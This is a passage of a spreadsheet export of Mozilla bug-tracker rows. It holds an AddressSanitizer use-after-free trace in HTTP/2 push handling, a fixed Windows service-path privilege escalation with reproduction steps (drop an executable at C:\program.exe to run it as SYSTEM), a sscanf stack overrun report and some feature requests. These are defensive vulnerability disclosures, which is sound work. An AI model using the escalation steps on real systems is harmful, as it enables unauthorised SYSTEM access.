    #1 0x7f4330719162 in mozilla::net::Http2Session::RecvPushPromise(mozilla::net::Http2Session*) /builds/worker/workspace/build/src/netwerk/protocol/http/Http2Session.cpp:2061
    #2 0x7f43307284c2 in mozilla::net::Http2Session::WriteSegmentsAgain(mozilla::net::nsAHttpSegmentWriter*, unsigned int, unsigned int*, bool*) /builds/worker/workspace/build/src/netwerk/protocol/http/Http2Session.cpp:3556:10
    #3 0x7f43308c9cb5 in mozilla::net::nsHttpConnection::OnSocketReadable() /builds/worker/workspace/build/src/netwerk/protocol/http/nsHttpConnection.cpp:2076:24
    #4 0x7f43308cc897 in mozilla::net::nsHttpConnection::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/protocol/http/nsHttpConnection.cpp:2419:17
    #5 0x7f43308cd0ec in non-virtual thunk to mozilla::net::nsHttpConnection::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/protocol/http/nsHttpConnection.cpp
    #6 0x7f432ff33538 in mozilla::net::nsSocketInputStream::OnSocketReady(nsresult) /builds/worker/workspace/build/src/netwerk/base/nsSocketTransport2.cpp:277:27
    #7 0x7f432ff42b13 in mozilla::net::nsSocketTransport::OnSocketReady(PRFileDesc*, short) /builds/worker/workspace/build/src/netwerk/base/nsSocketTransport2.cpp:2185:14
    #8 0x7f432ff53b01 in mozilla::net::nsSocketTransportService::DoPollIteration(mozilla::BaseTimeDuration&lt;mozilla::TimeDurationValueCalculator&gt;*) /builds/worker/workspace/build/src/netwerk/base/nsSocketTransportService2.cpp
    #9 0x7f432ff51c95 in mozilla::net::nsSocketTransportService::Run() /builds/worker/workspace/build/src/netwerk/base/nsSocketTransportService2.cpp:972:7
    #10 0x7f432ff5417c in non-virtual thunk to mozilla::net::nsSocketTransportService::Run() /builds/worker/workspace/build/src/netwerk/base/nsSocketTransportService2.cpp
    #11 0x7f432fcbf3d6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1162:14
    #12 0x7f432fcc56c8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:474:10
    #13 0x7f4330c4e28a in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:303:20
    #14 0x7f4330b94d8f in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #15 0x7f4330b94d8f in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #16 0x7f4330b94d8f in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #17 0x7f432fcb958a in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:449:11
    #18 0x7f4350751666 in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #19 0x7f43503956da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #20 0x7f434f37388e in clone /build/glibc-OTsEL5/glibc-2.27/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
0x61400042eebc is located 124 bytes inside of 440-byte region [0x61400042ee40,0x61400042eff8)
freed by thread T8 (Socket Thread) here:
    #0 0x55eef3d2b5d2 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7f432fb6e497 in RawRemove /builds/worker/workspace/build/src/xpcom/ds/PLDHashTable.cpp:637:3
    #2 0x7f432fb6e497 in RawRemove /builds/worker/workspace/build/src/xpcom/ds/PLDHashTable.cpp:621
    #3 0x7f432fb6e497 in PLDHashTable::RemoveEntry(PLDHashEntryHdr*) /builds/worker/workspace/build/src/xpcom/ds/PLDHashTable.cpp:615
    #4 0x7f4330709f50 in RemoveEntry /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTHashtable.h:214:48
    #5 0x7f4330709f50 in Remove /builds/worker/workspace/build/src/obj-firefox/dist/include/nsBaseHashtable.h:184
    #6 0x7f4330709f50 in mozilla::net::Http2Session::CleanupStream(mozilla::net::Http2Stream*, nsresult, mozilla::net::Http2Session::errorType) /builds/worker/workspace/build/src/netwerk/protocol/http/Http2Session.cpp:1243
    #7 0x7f433071b294 in CleanupStream /builds/worker/workspace/build/src/netwerk/protocol/http/Http2Session.cpp:1262:3
    #8 0x7f433071b294 in mozilla::net::Http2Session::CachePushCheckCallback::OnCacheEntryCheck(nsICacheEntry*, nsIApplicationCache*, unsigned int*) /builds/worker/workspace/build/src/netwerk/protocol/http/Http2Session.cpp:2224
    #9 0x7f4330586ede in mozilla::net::CacheEntry::InvokeCallback(mozilla::net::CacheEntry::Callback&amp;) /builds/worker/workspace/build/src/netwerk/cache2/CacheEntry.cpp:741:46
    #10 0x7f4330585faf in mozilla::net::CacheEntry::InvokeCallbacks(bool) /builds/worker/workspace/build/src/netwerk/cache2/CacheEntry.cpp:668:30
    #11 0x7f4330581650 in mozilla::net::CacheEntry::InvokeCallbacks() /builds/worker/workspace/build/src/netwerk/cache2/CacheEntry.cpp:610:31
    #12 0x7f433057f3eb in Open /builds/worker/workspace/build/src/netwerk/cache2/CacheEntry.cpp:340:3
    #13 0x7f433057f3eb in mozilla::net::CacheEntry::AsyncOpen(nsICacheEntryOpenCallback*, unsigned int) /builds/worker/workspace/build/src/netwerk/cache2/CacheEntry.cpp:315
    #14 0x7f433057a695 in mozilla::net::CacheStorage::AsyncOpenURI(nsIURI*, nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsICacheEntryOpenCallback*) /builds/worker/workspace/build/src/netwerk/cache2/CacheStorage.cpp:105:19
    #15 0x7f4330718463 in mozilla::net::Http2Session::RecvPushPromise(mozilla::net::Http2Session*) /builds/worker/workspace/build/src/netwerk/protocol/http/Http2Session.cpp:2049:11
    #16 0x7f43307284c2 in mozilla::net::Http2Session::WriteSegmentsAgain(mozilla::net::nsAHttpSegmentWriter*, unsigned int, unsigned int*, bool*) /builds/worker/workspace/build/src/netwerk/protocol/http/Http2Session.cpp:3556:10
    #17 0x7f43308c9cb5 in mozilla::net::nsHttpConnection::OnSocketReadable() /builds/worker/workspace/build/src/netwerk/protocol/http/nsHttpConnection.cpp:2076:24
    #18 0x7f43308cc897 in mozilla::net::nsHttpConnection::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/protocol/http/nsHttpConnection.cpp:2419:17
    #19 0x7f43308cd0ec in non-virtual thunk to mozilla::net::nsHttpConnection::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/protocol/http/nsHttpConnection.cpp
    #20 0x7f432ff33538 in mozilla::net::nsSocketInputStream::OnSocketReady(nsresult) /builds/worker/workspace/build/src/netwerk/base/nsSocketTransport2.cpp:277:27
    #21 0x7f432ff42b13 in mozilla::net::nsSocketTransport::OnSocketReady(PRFileDesc*, short) /builds/worker/workspace/build/src/netwerk/base/nsSocketTransport2.cpp:2185:14
    #22 0x7f432ff53b01 in mozilla::net::nsSocketTransportService::DoPollIteration(mozilla::BaseTimeDuration&lt;mozilla::TimeDurationValueCalculator&gt;*) /builds/worker/workspace/build/src/netwerk/base/nsSocketTransportService2.cpp
    #23 0x7f432ff51c95 in mozilla::net::nsSocketTransportService::Run() /builds/worker/workspace/build/src/netwerk/base/nsSocketTransportService2.cpp:972:7
    #24 0x7f432ff5417c in non-virtual thunk to mozilla::net::nsSocketTransportService::Run() /builds/worker/workspace/build/src/netwerk/base/nsSocketTransportService2.cpp
    #25 0x7f432fcbf3d6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1162:14
    #26 0x7f432fcc56c8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:474:10
    #27 0x7f4330c4e28a in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:303:20
    #28 0x7f4330b94d8f in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #29 0x7f4330b94d8f in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #30 0x7f4330b94d8f in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #31 0x7f432fcb958a in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:449:11
    #32 0x7f4350751666 in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #33 0x7f43503956da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
previously allocated by thread T8 (Socket Thread) here:
    #0 0x55eef3d2b953 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x55eef3d6017d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:68:15
    #2 0x7f4330716ec2 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:131:10
    #3 0x7f4330716ec2 in mozilla::net::Http2Session::RecvPushPromise(mozilla::net::Http2Session*) /builds/worker/workspace/build/src/netwerk/protocol/http/Http2Session.cpp:1913
    #4 0x7f43307284c2 in mozilla::net::Http2Session::WriteSegmentsAgain(mozilla::net::nsAHttpSegmentWriter*, unsigned int, unsigned int*, bool*) /builds/worker/workspace/build/src/netwerk/protocol/http/Http2Session.cpp:3556:10
    #5 0x7f43308c9cb5 in mozilla::net::nsHttpConnection::OnSocketReadable() /builds/worker/workspace/build/src/netwerk/protocol/http/nsHttpConnection.cpp:2076:24
    #6 0x7f43308cc897 in mozilla::net::nsHttpConnection::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/protocol/http/nsHttpConnection.cpp:2419:17
    #7 0x7f43308cd0ec in non-virtual thunk to mozilla::net::nsHttpConnection::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/protocol/http/nsHttpConnection.cpp
    #8 0x7f432ff33538 in mozilla::net::nsSocketInputStream::OnSocketReady(nsresult) /builds/worker/workspace/build/src/netwerk/base/nsSocketTransport2.cpp:277:27
    #9 0x7f432ff42b13 in mozilla::net::nsSocketTransport::OnSocketReady(PRFileDesc*, short) /builds/worker/workspace/build/src/netwerk/base/nsSocketTransport2.cpp:2185:14
    #10 0x7f432ff53b01 in mozilla::net::nsSocketTransportService::DoPollIteration(mozilla::BaseTimeDuration&lt;mozilla::TimeDurationValueCalculator&gt;*) /builds/worker/workspace/build/src/netwerk/base/nsSocketTransportService2.cpp
    #11 0x7f432ff51c95 in mozilla::net::nsSocketTransportService::Run() /builds/worker/workspace/build/src/netwerk/base/nsSocketTransportService2.cpp:972:7
    #12 0x7f432ff5417c in non-virtual thunk to mozilla::net::nsSocketTransportService::Run() /builds/worker/workspace/build/src/netwerk/base/nsSocketTransportService2.cpp
    #13 0x7f432fcbf3d6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1162:14
    #14 0x7f432fcc56c8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:474:10
    #15 0x7f4330c4e28a in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:303:20
    #16 0x7f4330b94d8f in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #17 0x7f4330b94d8f in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #18 0x7f4330b94d8f in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #19 0x7f432fcb958a in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:449:11
    #20 0x7f4350751666 in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #21 0x7f43503956da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
Thread T8 (Socket Thread) created by T0 here:
    #0 0x55eef3d1426d in __interceptor_pthread_create /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:210:3
    #1 0x7f435074e395 in _PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:433:14
    #2 0x7f435074df7e in PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:518:12
    #3 0x7f432fcbb889 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:655:8
    #4 0x7f432fcc4810 in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/workspace/build/src/xpcom/threads/nsThreadManager.cpp:414:12
    #5 0x7f432fcc8549 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, nsIRunnable*, unsigned int) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:127:57
    #6 0x7f432ff4f9bc in NS_NewNamedThread&lt;14&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:71:10
    #7 0x7f432ff4f9bc in mozilla::net::nsSocketTransportService::Init() /builds/worker/workspace/build/src/netwerk/base/nsSocketTransportService2.cpp:608
    #8 0x7f432fc52dc2 in mozilla::xpcom::CreateInstanceImpl(mozilla::xpcom::ModuleID, nsISupports*, nsID const&amp;, void**) /builds/worker/workspace/build/src/obj-firefox/xpcom/components/StaticComponents.cpp:5349:7
    #9 0x7f432fc75fdf in CreateInstance /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:220:46
    #10 0x7f432fc75fdf in nsComponentManagerImpl::GetServiceLocked((anonymous namespace)::MutexLock&amp;, (anonymous namespace)::EntryWrapper&amp;, nsID const&amp;, void**) /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:1396
    #11 0x7f432fc6b03c in nsComponentManagerImpl::GetServiceByContractID(char const*, nsID const&amp;, void**) /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:1583:10
    #12 0x7f432fc7ecd5 in CallGetService /builds/worker/workspace/build/src/xpcom/components/nsComponentManagerUtils.cpp:61:43
    #13 0x7f432fc7ecd5 in nsGetServiceByContractIDWithError::operator()(nsID const&amp;, void**) const /builds/worker/workspace/build/src/xpcom/components/nsComponentManagerUtils.cpp:253
    #14 0x7f432fb069be in nsCOMPtr_base::assign_from_gs_contractid_with_error(nsGetServiceByContractIDWithError const&amp;, nsID const&amp;) /builds/worker/workspace/build/src/xpcom/base/nsCOMPtr.cpp:91:7
    #15 0x7f432fe9d9dd in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:746:5
    #16 0x7f432fe9d9dd in InitializeSocketTransportService /builds/worker/workspace/build/src/netwerk/base/nsIOService.cpp:306
    #17 0x7f432fe9d9dd in mozilla::net::nsIOService::SetOffline(bool) /builds/worker/workspace/build/src/netwerk/base/nsIOService.cpp:1127
    #18 0x7f432fe9c4da in mozilla::net::nsIOService::Init() /builds/worker/workspace/build/src/netwerk/base/nsIOService.cpp:271:3
    #19 0x7f432fe9f91e in mozilla::net::nsIOService::GetInstance() /builds/worker/workspace/build/src/netwerk/base/nsIOService.cpp:362:9
    #20 0x7f432fc536b6 in mozilla::xpcom::CreateInstanceImpl(mozilla::xpcom::ModuleID, nsISupports*, nsID const&amp;, void**) /builds/worker/workspace/build/src/obj-firefox/xpcom/components/StaticComponents.cpp:5367:48
    #21 0x7f432fc75fdf in CreateInstance /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:220:46
    #22 0x7f432fc75fdf in nsComponentManagerImpl::GetServiceLocked((anonymous namespace)::MutexLock&amp;, (anonymous namespace)::EntryWrapper&amp;, nsID const&amp;, void**) /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:1396
    #23 0x7f432fc6b03c in nsComponentManagerImpl::GetServiceByContractID(char const*, nsID const&amp;, void**) /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:1583:10
    #24 0x7f4331d88821 in CallGetService&lt;nsIIOService&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsServiceManagerUtils.h:73:10
    #25 0x7f4331d88821 in nsScriptSecurityManager::Init() /builds/worker/workspace/build/src/caps/nsScriptSecurityManager.cpp:1405
    #26 0x7f4331d8974c in nsScriptSecurityManager::InitStatics() /builds/worker/workspace/build/src/caps/nsScriptSecurityManager.cpp:1465:28
    #27 0x7f4331786a58 in nsXPConnect::InitStatics() /builds/worker/workspace/build/src/js/xpconnect/src/nsXPConnect.cpp:135:3
    #28 0x7f43317206b8 in xpcModuleCtor() /builds/worker/workspace/build/src/js/xpconnect/src/XPCModule.cpp:11:3
    #29 0x7f4338ebc2f8 in nsLayoutModuleInitialize() /builds/worker/workspace/build/src/layout/build/nsLayoutModule.cpp:106:7
    #30 0x7f432fc6c0d5 in nsComponentManagerImpl::Init() /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:532:5
    #31 0x7f432fd15509 in NS_InitXPCOM2 /builds/worker/workspace/build/src/xpcom/build/XPCOMInit.cpp:451:51
    #32 0x7f433c0f5874 in Initialize /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:1364:8
    #33 0x7f433c0f5874 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4834
    #34 0x7f433c0f73b0 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4922:21
    #35 0x55eef3d5e1ec in do_main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:214:22
    #36 0x55eef3d5e1ec in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:293
    #37 0x7f434f273b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/netwerk/protocol/http/Http2Stream.h:62:45 in SetHTTPState
Shadow bytes around the buggy address:
  0x0c288007dd80: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c288007dd90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c288007dda0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c288007ddb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c288007ddc0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=&gt;0x0c288007ddd0: fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd  
  0x0c288007dde0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c288007ddf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c288007de00: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c288007de10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c288007de2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18805==ABORTING
```</t>
        </is>
      </c>
      <c r="X4626" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4627">
      <c r="A4627" t="n">
        <v>854088</v>
      </c>
      <c r="B4627" t="inlineStr">
        <is>
          <t>2013-03-23 04:36:52 -0700</t>
        </is>
      </c>
      <c r="C4627" t="inlineStr">
        <is>
          <t>old MozillaMaintenance Service registry entry not updated, leads to Trusted Path Privilege Escalation</t>
        </is>
      </c>
      <c r="D4627" t="inlineStr">
        <is>
          <t>2024-05-30 08:01:37 -0700</t>
        </is>
      </c>
      <c r="E4627" t="n">
        <v>1</v>
      </c>
      <c r="F4627" t="n">
        <v>1</v>
      </c>
      <c r="G4627" t="n">
        <v>3</v>
      </c>
      <c r="H4627" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4627" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4627" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K4627" t="inlineStr">
        <is>
          <t>19 Branch</t>
        </is>
      </c>
      <c r="L4627" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4627" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4627" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4627" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4627" t="inlineStr">
        <is>
          <t>[adv-main21+]</t>
        </is>
      </c>
      <c r="Q4627" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4627" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4627" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T4627" t="n">
        <v>1</v>
      </c>
      <c r="U4627" t="n">
        <v>0</v>
      </c>
      <c r="V4627" t="n">
        <v>40</v>
      </c>
      <c r="W4627" t="inlineStr">
        <is>
          <t>Created attachment 728607
payload.zip
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Build ID: 20130307023931
Steps to reproduce:
Steps to reproduce:
1. Copy calc.exe to C:\program.exe or C:\Program Files (x86)\mozilla.exe. You can also use my payload (attached).
2. Start MozillaMaintenance using the service manager or the command-line.
3. calc.exe (program.exe - mozilla.exe) will be run with SYSTEM privileges
Actual results:
The malicious executable was executed with SYSTEM privileges!
Expected results:
The service executable shouldn't run program.exe (C:\program.exe) or mozilla.exe (C:\Program Files (x86)\mozilla.exe). Although you need to be running as a high integrity process to create files in the root directory and its subfolders you could use this vulnerability to escalate your privileges or to automatically re-compromise the target in the future (with SYSTEM privileges)!</t>
        </is>
      </c>
      <c r="X4627" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4628">
      <c r="A4628" t="n">
        <v>1448804</v>
      </c>
      <c r="B4628" t="inlineStr">
        <is>
          <t>2018-03-26 02:47:41 -0700</t>
        </is>
      </c>
      <c r="C4628" t="inlineStr">
        <is>
          <t>Point users to a feedback form at the end of the uninstall process</t>
        </is>
      </c>
      <c r="D4628" t="inlineStr">
        <is>
          <t>2018-10-10 14:35:54 -0700</t>
        </is>
      </c>
      <c r="E4628" t="n">
        <v>1</v>
      </c>
      <c r="F4628" t="n">
        <v>1</v>
      </c>
      <c r="G4628" t="n">
        <v>2</v>
      </c>
      <c r="H4628" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4628" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4628" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K4628" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4628" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4628" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4628" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4628" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4628" t="inlineStr"/>
      <c r="Q4628" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4628" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4628" t="inlineStr">
        <is>
          <t>Firefox 63</t>
        </is>
      </c>
      <c r="T4628" t="n">
        <v>1</v>
      </c>
      <c r="U4628" t="n">
        <v>0</v>
      </c>
      <c r="V4628" t="n">
        <v>31</v>
      </c>
      <c r="W4628" t="inlineStr">
        <is>
          <t>Point users to an uninstall form at the end of the uninstallation process.</t>
        </is>
      </c>
      <c r="X4628" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4629">
      <c r="A4629" t="n">
        <v>1174479</v>
      </c>
      <c r="B4629" t="inlineStr">
        <is>
          <t>2015-06-13 16:27:56 -0700</t>
        </is>
      </c>
      <c r="C4629" t="inlineStr">
        <is>
          <t>Bad sscanf argument in AnimationThread overruns stack variable</t>
        </is>
      </c>
      <c r="D4629" t="inlineStr">
        <is>
          <t>2018-10-31 06:12:35 -0700</t>
        </is>
      </c>
      <c r="E4629" t="n">
        <v>1</v>
      </c>
      <c r="F4629" t="n">
        <v>1</v>
      </c>
      <c r="G4629" t="n">
        <v>6</v>
      </c>
      <c r="H4629" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4629" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4629" t="inlineStr">
        <is>
          <t>Widget: Gonk</t>
        </is>
      </c>
      <c r="K4629" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L4629" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4629" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4629" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4629" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4629" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+]</t>
        </is>
      </c>
      <c r="Q4629" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4629" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4629" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T4629" t="n">
        <v>1</v>
      </c>
      <c r="U4629" t="n">
        <v>0</v>
      </c>
      <c r="V4629" t="n">
        <v>24</v>
      </c>
      <c r="W4629" t="inlineStr">
        <is>
          <t>AnimationThread (38.0.1\widget\gonk\libdisplay\BootAnimation.cpp line 449) can overrun a stack variable if an operating system file contains oversize strings. If that happens, it also pushes elements into an std::vector that contain unterminated strings.
This problem is on lines 523-24:
253: struct AnimationPart {
254:    int32_t count;
255:    int32_t pause;
256:    char path[256];
257:    vector&lt;AnimationFrame&gt; frames;
258: };
...
490:     vector&lt;AnimationPart&gt; parts;
...
519:        AnimationPart part;
...
523:        } else if (sscanf(line, "p %d %d %s",
524:                          &amp;part.count, &amp;part.pause, part.path)) {
525:            parts.push_back(part);
...
The "%s" specifier will write into part.path as many characters as are available, thus potentially overrunning that variable.
The variable "line" that line 523 parses comes from an operating system file that is documented on line 492 et seq.
It is unclear what security effects this overrun can have, but at least the data causing the overrun appears to be under operating system control.</t>
        </is>
      </c>
      <c r="X4629" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4630">
      <c r="A4630" t="n">
        <v>232272</v>
      </c>
      <c r="B4630" t="inlineStr">
        <is>
          <t>2004-01-26 23:12:31 -0800</t>
        </is>
      </c>
      <c r="C4630" t="inlineStr">
        <is>
          <t>Better management of search engines for toolbar over the current add new engines system (ability to remove and order engines)</t>
        </is>
      </c>
      <c r="D4630" t="inlineStr">
        <is>
          <t>2014-04-26 03:11:48 -0700</t>
        </is>
      </c>
      <c r="E4630" t="n">
        <v>1</v>
      </c>
      <c r="F4630" t="n">
        <v>1</v>
      </c>
      <c r="G4630" t="n">
        <v>2</v>
      </c>
      <c r="H4630" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4630" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4630" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K4630" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L4630" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4630" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4630" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4630" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4630" t="inlineStr">
        <is>
          <t>[asaP1] ui-polish [swag: 5d]</t>
        </is>
      </c>
      <c r="Q4630" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4630" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4630" t="inlineStr">
        <is>
          <t>Firefox 2 alpha2</t>
        </is>
      </c>
      <c r="T4630" t="n">
        <v>1</v>
      </c>
      <c r="U4630" t="n">
        <v>48</v>
      </c>
      <c r="V4630" t="n">
        <v>94</v>
      </c>
      <c r="W4630" t="inlineStr">
        <is>
          <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7a) Gecko/20040102 Firebird/0.7+
There should be a GUI method implemented for the management of search engine
extensions in the toolbar. It is a straightforward process to add new ones using
the "Add New Engines" option in the drop-down menu, but there is presently no
way to use the GUI to manage installed plugins. Currently, the files have to be
removed manually from the searchplugins folder through the filesystem, which
works fine but is a hassle. Instead of an "add engines" menuitem which goes
directly to Mycroft, a GUI interface should be implemented, perhaps under "Web
Features" which could have controls for adding (which would go to Mycroft),
removing (would work like the extensions list - click on one and click remove to
